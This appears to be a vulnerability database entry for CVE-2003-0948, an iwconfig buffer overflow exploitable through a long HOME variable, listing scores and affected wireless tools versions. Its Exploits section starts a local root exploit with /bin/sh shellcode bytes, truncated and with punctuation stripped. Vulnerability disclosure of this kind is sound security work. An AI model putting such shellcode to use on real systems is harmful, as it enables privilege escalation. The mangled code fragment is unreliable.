7.2
CVSSv2

CVE-2003-0948

Published: 15/12/2003 Updated: 05/09/2008
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in iwconfig allows local users to execute arbitrary code via a long HOME environment variable.

Vulnerable Product Search on Vulmon Subscribe to Product

wireless tools wireless tools 20

wireless tools wireless tools 21

wireless tools wireless tools 22

wireless tools wireless tools 23

wireless tools wireless tools 24

wireless tools wireless tools 25

wireless tools wireless tools 19

wireless tools wireless tools 26

Exploits

// (if the iwconfig executable is setuid) /str0ke #include <stdioh> #include <stringh> #include <unistdh> #include <stdlibh> /* 45 Byte /bin/sh >> wwwmilw0rmcom/idphp?id=1169 (wwwexploit-dbcom/exploits/1169/) */ char shellcode[]= "\x31\xc0\x31\xdb\x50\x68\x2f\x2f" ...